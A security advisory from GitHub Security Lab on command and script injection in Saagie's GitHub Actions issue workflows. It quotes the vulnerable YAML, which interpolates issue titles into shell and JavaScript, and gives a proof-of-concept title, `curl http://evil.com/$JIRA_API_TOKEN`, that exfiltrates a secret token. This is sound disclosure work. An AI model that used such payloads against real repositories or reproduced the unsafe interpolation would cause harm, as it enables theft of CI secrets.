GHSL-2021-001: Command Injection and Script Injection in Saagie create and close issue workflows

Coordinated Disclosure Timeline

• 2021-01-18: Issue reported to security at Saagie.
• 2021-02-23: Report acknowledged.
• 2021-03-01: Additional issue reported.
• 2021-04-21: No response. Asked for an update.
• 2021-07-20: Asked for an update.
• 2021-07-26: Confirmation received.
• 2021-07-29: Patch files were sent to security at Saagie to apply. No reply.
• 2021-12-06: Public pull requests were created.
• 2021-12-08: Response was received.
• 2022-01-14: The pull requests were merged.

Summary

The close_issue.yml and create_issue.yml GitHub workflows in saagie/sdk, saagie/technologies-plugin and saagie/technologies repositories are vulnerable to arbitrary command/script injection.

Product

saagie/sdk GitHub repository
saagie/technologies-plugin GitHub repository
saagie/technologies GitHub repository

Tested Version

saagie/sdk
saagie/technologies-plugin
saagie/technologies

Details

Issue 1: The issue title is used to format a shell command

An issue title is used to format a bash script:

on:
  issues:
    types: [closed, deleted]
...
  - name: Extract JIRA number
    run: echo "::set-output name=jira_number::$(echo ${{ github.event.issue.title }}| sed 's/.*\[\(${{ secrets.JIRA_PROJECT }}-[[:digit:]]\{1,\}\)\].*/\1/')"
...

Impact

This vulnerability allows for arbitrary command injection into the bash script that may allow exfiltration of the secret tokens to the attacker controlled server. For a proof a concept an issue comment with the following title `curl http://evil.com/$JIRA_API_TOKEN` would exfiltrate the secret Jira token to the attacker controlled server.

Issue 2: The issue title is used to format a script

The expression expansion in ${{ }} is done before the script is executed and a single quote in the title allows script injection.

...
- name: Change Title
  uses: actions/github-script@0.8.0
  with:
    github-token: ${{secrets.GITHUB_TOKEN}}
    script: >
      github.issues.update({
      issue_number: context.issue.number,
      owner: context.repo.owner,
      repo: context.repo.repo,
      title: '[${{ steps.create_jira_issue.outputs.issue }}] ${{ env.ISSUE_TITLE }}'
      })
...

Impact

Similarly to Issue 1 this vulnerability allows for arbitrary script injection that may allow exfiltration of the secret tokens to the attacker controlled server.

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-001 in any communication regarding this issue.